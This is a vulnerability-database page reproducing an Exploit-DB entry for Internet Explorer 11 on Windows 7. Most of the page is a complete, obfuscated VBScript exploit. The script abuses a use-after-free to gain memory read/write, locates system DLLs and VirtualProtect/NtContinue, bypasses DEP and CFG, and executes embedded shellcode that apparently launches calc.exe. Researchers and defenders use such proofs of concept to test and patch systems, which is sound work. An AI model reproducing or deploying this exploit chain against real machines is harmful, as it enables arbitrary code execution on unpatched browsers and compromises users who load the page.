Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Internet Explorer 11 (Windows 7 x86/x64) - vbscript Code Execution

🗓️ 21 May 2018 00:00:00Reported by smgorelikType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 185 Views

Microsoft Internet Explorer 11 (Windows 7 x86/x64) - vbscript Code Executio

Code
<!doctype html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="x-ua-compatible" content="IE=10">
<meta http-equiv="Expires" content="0">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-control" content="no-cache">
<meta http-equiv="Cache" content="no-cache">
</head>
<body>
<script language="vbscript">
Dim lIIl
Dim IIIlI(6),IllII(6)
Dim IllI
Dim IIllI(40)
Dim lIlIIl,lIIIll
Dim IlII
Dim llll,IIIIl
Dim llllIl,IlIIII
Dim NtContinueAddr,VirtualProtectAddr

IlII=195948557
lIlIIl=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000")
lIIIll=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000")
IllI=195890093
Function IIIII(Domain) 
	lIlII=0
	IllllI=0
	IIlIIl=0
	Id=CLng(Rnd*1000000)
	lIlII=CLng((&h27d+8231-&H225b)*Rnd)Mod (&h137d+443-&H152f)+(&h1c17+131-&H1c99)
	If(Id+lIlII)Mod (&h5c0+6421-&H1ed3)=(&h10ba+5264-&H254a) Then
		lIlII=lIlII-(&h86d+6447-&H219b)
	End If

	IllllI=CLng((&h2bd+6137-&H1a6d)*Rnd)Mod (&h769+4593-&H1940)+(&h1a08+2222-&H2255)
	IIlIIl=CLng((&h14e6+1728-&H1b5d)*Rnd)Mod (&hfa3+1513-&H1572)+(&h221c+947-&H256e)
	IIIII=Domain &"?" &Chr(IllllI) &"=" &Id &"&" &Chr(IIlIIl) &"=" &lIlII
End Function

Function lIIII(ByVal lIlIl)
	IIll=""
	For index=0 To Len(lIlIl)-1
		IIll=IIll &lIlI(Asc(Mid(lIlIl,index+1,1)),2)
	Next
	IIll=IIll &"00"
	If Len(IIll)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then
		IIll=IIll &"00"
	End If
	For IIIl=(&h1a1a+3208-&H26a2) To Len(IIll)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4)
		lIIIlI=Mid(IIll,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3))
		lIlIll=Mid(IIll,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504))
		lIIII=lIIII &"%u" &lIlIll &lIIIlI
	Next
End Function
Function lIlI(ByVal Number,ByVal Length)
	IIII=Hex(Number)
	If Len(IIII)<Length Then
		IIII=String(Length-Len(IIII),"0") &IIII    'pad allign with zeros 
	Else
		IIII=Right(IIII,Length)
	End If
	lIlI=IIII
End Function
Function GetUint32(lIII)
	Dim value
	llll.mem(IlII+8)=lIII+4
	llll.mem(IlII)=8		'type string
	value=llll.P0123456789
	llll.mem(IlII)=2
	GetUint32=value
End Function
Function IllIIl(lIII)
	IllIIl=GetUint32(lIII) And (131071-65536)
End Function
Function lllII(lIII)
	lllII=GetUint32(lIII)  And (&h17eb+1312-&H1c0c)
End Function
Sub llllll
End Sub
Function GetMemValue
	llll.mem(IlII)=(&h713+3616-&H1530)
	GetMemValue=llll.mem(IlII+(&h169c+712-&H195c))
End Function
Sub SetMemValue(ByRef IlIIIl)
	llll.mem(IlII+(&h715+3507-&H14c0))=IlIIIl
End Sub
Function LeakVBAddr
	On Error Resume Next
	Dim lllll
	lllll=llllll
	lllll=null
	SetMemValue lllll
	LeakVBAddr=GetMemValue()
End Function
Function GetBaseByDOSmodeSearch(IllIll)
	Dim llIl
	llIl=IllIll And &hffff0000
	Do While GetUint32(llIl+(&h748+4239-&H176f))<>544106784 Or GetUint32(llIl+(&ha2a+7373-&H268b))<>542330692
		llIl=llIl-65536
	Loop
	GetBaseByDOSmodeSearch=llIl
End Function
Function StrCompWrapper(lIII,llIlIl)
	Dim lIIlI,IIIl
	lIIlI=""
	For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835)
		lIIlI=lIIlI &Chr(lllII(lIII+IIIl))
	Next
	StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl))
End Function
Function GetBaseFromImport(base_address,name_input)
	Dim import_rva,nt_header,descriptor,import_dir
	Dim IIIIII
	nt_header=GetUint32(base_address+(&h3c))
	import_rva=GetUint32(base_address+nt_header+&h80)
	import_dir=base_address+import_rva
	descriptor=0
	Do While True
		Dim Name
		Name=GetUint32(import_dir+descriptor*(&h14)+&hc)
		If Name=0 Then
			GetBaseFromImport=&hBAAD0000
			Exit Function
		Else
			If StrCompWrapper(base_address+Name,name_input)=0 Then
				Exit Do
			End If
		End If
		descriptor=descriptor+1
	Loop
	IIIIII=GetUint32(import_dir+descriptor*(&h14)+&h10)
	GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+IIIIII))
End Function

Function GetProcAddr(dll_base,name)
	Dim p,export_dir,index
	Dim function_rvas,function_names,function_ordin
	Dim Illlll
	p=GetUint32(dll_base+&h3c)
	p=GetUint32(dll_base+p+&h78)
	export_dir=dll_base+p

	function_rvas=dll_base+GetUint32(export_dir+&h1c)
	function_names=dll_base+GetUint32(export_dir+&h20)
	function_ordin=dll_base+GetUint32(export_dir+&h24)
	index=0
	Do While True
		Dim lllI
		lllI=GetUint32(function_names+index*4)
		If StrCompWrapper(dll_base+lllI,name)=0 Then
			Exit Do
		End If
		index=index+1
	Loop
	Illlll=IllIIl(function_ordin+index*2)
	p=GetUint32(function_rvas+Illlll*4)
	GetProcAddr=dll_base+p
End Function

Function GetShellcode()
	IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf2e2%u5752%u528b%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059%ud301%u498b%ue318%u493a%u348b%u018b%u31d6%uacff%ucfc1%u010d%u38c7%u75e0%u03f6%uf87d%u7d3b%u7524%u58e4%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u5fe0%u5a5f%u128b%u8deb%u6a5d%u8d01%ub285%u0000%u5000%u3168%u6f8b%uff87%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff%u6163%u636c%u652e%u6578%u4100%u0065%u0000%u0000%u0000%u0000%u0000%ucc00%ucccc%ucccc%ucccc%ucccc" &lIIII(IIIII("")))
	IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
	GetShellcode=IIlI
End Function
Function EscapeAddress(ByVal value)
	Dim High,Low
	High=lIlI((value And &hffff0000)/&h10000,4)
	Low=lIlI(value And &hffff,4)
	EscapeAddress=Unescape("%u" &Low &"%u" &High)
End Function
Function lIllIl
	Dim IIIl,IlllI,IIlI,IlIII,llllI,llIII,lIllI
	IlllI=lIlI(NtContinueAddr,8)
	IlIII=Mid(IlllI,1,2)
	llllI=Mid(IlllI,3,2)
	llIII=Mid(IlllI,5,2)
	lIllI=Mid(IlllI,7,2)
	IIlI=""
	IIlI=IIlI &"%u0000%u" &lIllI &"00"
	For IIIl=1 To 3
		IIlI=IIlI &"%u" &llllI &llIII
		IIlI=IIlI &"%u" &lIllI &IlIII
	Next
	IIlI=IIlI &"%u" &llllI &llIII
	IIlI=IIlI &"%u00" &IlIII
	lIllIl=Unescape(IIlI)
End Function
Function WrapShellcodeWithNtContinueContext(ShellcodeAddrParam) 'bypass cfg
	Dim IIlI
	IIlI=String((100334-65536),Unescape("%u4141"))
	IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
	IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
	IIlI=IIlI &EscapeAddress(&h3000)
	IIlI=IIlI &EscapeAddress(&h40)
	IIlI=IIlI &EscapeAddress(ShellcodeAddrParam-8)
	IIlI=IIlI &String(6,Unescape("%u4242"))
	IIlI=IIlI &lIllIl()
	IIlI=IIlI &String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
	WrapShellcodeWithNtContinueContext=IIlI
End Function
Function ExpandWithVirtualProtect(lIlll)
	Dim IIlI
	Dim lllllI
	lllllI=lIlll+&h23
	IIlI=""
	IIlI=IIlI &EscapeAddress(lllllI)
	IIlI=IIlI &String((&hb8-LenB(IIlI))/2,Unescape("%4141"))
	IIlI=IIlI &EscapeAddress(VirtualProtectAddr)
	IIlI=IIlI &EscapeAddress(&h1b)
	IIlI=IIlI &EscapeAddress(0)
	IIlI=IIlI &EscapeAddress(lIlll)
	IIlI=IIlI &EscapeAddress(&h23)
	IIlI=IIlI &String((&400-LenB(IIlI))/2,Unescape("%u4343"))
	ExpandWithVirtualProtect=IIlI
End Function
Sub ExecuteShellcode
	llll.mem(IlII)=&h4d 'DEP bypass
	llll.mem(IlII+8)=0
    msgbox(IlII)		'VT replaced
End Sub

Class cla1
Private Sub Class_Terminate()
	Set IIIlI(IllI)=lIIl((&h1078+5473-&H25d8))
	IllI=IllI+(&h14b5+2725-&H1f59)
	lIIl((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d)
End Sub

End Class

Class cla2
Private Sub Class_Terminate()
	Set IllII(IllI)=lIIl((&h15b+3616-&Hf7a))
	IllI=IllI+(&h880+542-&Ha9d)
	lIIl((&h1f75+342-&H20ca))=(&had3+3461-&H1857)
End Sub
End Class

Class IIIlIl
End Class

Class llIIl
Dim mem
Function P
End Function
Function SetProp(Value)
	mem=Value
	SetProp=0
End Function
End Class

Class IIIlll
Dim mem
Function P0123456789
	P0123456789=LenB(mem(IlII+8))
End Function
Function SPP
End Function
End Class

Class lllIIl
Public Default Property Get P
Dim llII
P=174088534690791e-324
For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c)
	IIIlI(IIIl)=(&h2176+711-&H243d)
Next
Set llII=New IIIlll
llII.mem=lIlIIl
For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c)
	Set IIIlI(IIIl)=llII
Next
End Property
End Class

Class llllII
Public Default Property Get P
Dim llII
P=636598737289582e-328
For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84)
	IllII(IIIl)=(&h442+2598-&He68)
Next
Set llII=New IIIlll
llII.mem=lIIIll
For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b)
	Set IllII(IIIl)=llII
Next
End Property
End Class

Set llllIl=New lllIIl
Set IlIIII=New llllII
Sub UAF
	For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233)
		Set IIllI(IIIl)=New IIIlIl
	Next
	For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed)
		Set IIllI(IIIl)=New llIIl
	Next
	IllI=0
	For IIIl=0 To 6
		ReDim lIIl(1)
		Set lIIl(1)=New cla1
		Erase lIIl
	Next
	Set llll=New llIIl
	IllI=0
	For IIIl=0 To 6
		ReDim lIIl(1)
		Set lIIl(1)=New cla2
		Erase lIIl
	Next
	Set IIIIl=New llIIl
End Sub
Sub InitObjects
	llll.SetProp(llllIl)
	IIIIl.SetProp(IlIIII)
	IlII=IIIIl.mem
End Sub

Sub StartExploit
	UAF
	InitObjects
	vb_adrr=LeakVBAddr()
	Alert "CScriptEntryPointObject Leak: 0x" & Hex(vb_adrr) & vbcrlf & "VirtualTable address: 0x" & Hex(GetUint32(vb_adrr))
	vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
	Alert "VBScript Base: 0x" & Hex(vbs_base) 
	msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")
	Alert "MSVCRT Base: 0x" & Hex(msv_base) 
	krb_base=GetBaseFromImport(msv_base,"kernelbase.dll")
	Alert "KernelBase Base: 0x" & Hex(krb_base) 
	ntd_base=GetBaseFromImport(msv_base,"ntdll.dll")
	Alert "Ntdll Base: 0x" & Hex(ntd_base) 
	VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")
	Alert "KernelBase!VirtualProtect Address 0x" & Hex(VirtualProtectAddr) 
	NtContinueAddr=GetProcAddr(ntd_base,"NtContinue")
	Alert "KernelBase!VirtualProtect Address 0x" & Hex(NtContinueAddr) 
	SetMemValue GetShellcode()
	ShellcodeAddr=GetMemValue()+8
	Alert "Shellcode Address 0x" & Hex(ShellcodeAddr) 
	SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
	lIlll=GetMemValue()+69596
	SetMemValue ExpandWithVirtualProtect(lIlll)
	llIIll=GetMemValue()
	Alert "Executing Shellcode"
	ExecuteShellcode
End Sub
StartExploit
</script>
</body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 May 2018 00:00Current
7High risk
Vulners AI Score7
microsoftinternet explorerwindows 7vbscriptcode executionhtmlcharsetcache controlfunctioncodewindows64-bit32-bitscriptsecuritymemoryvulnerabilityexploit
185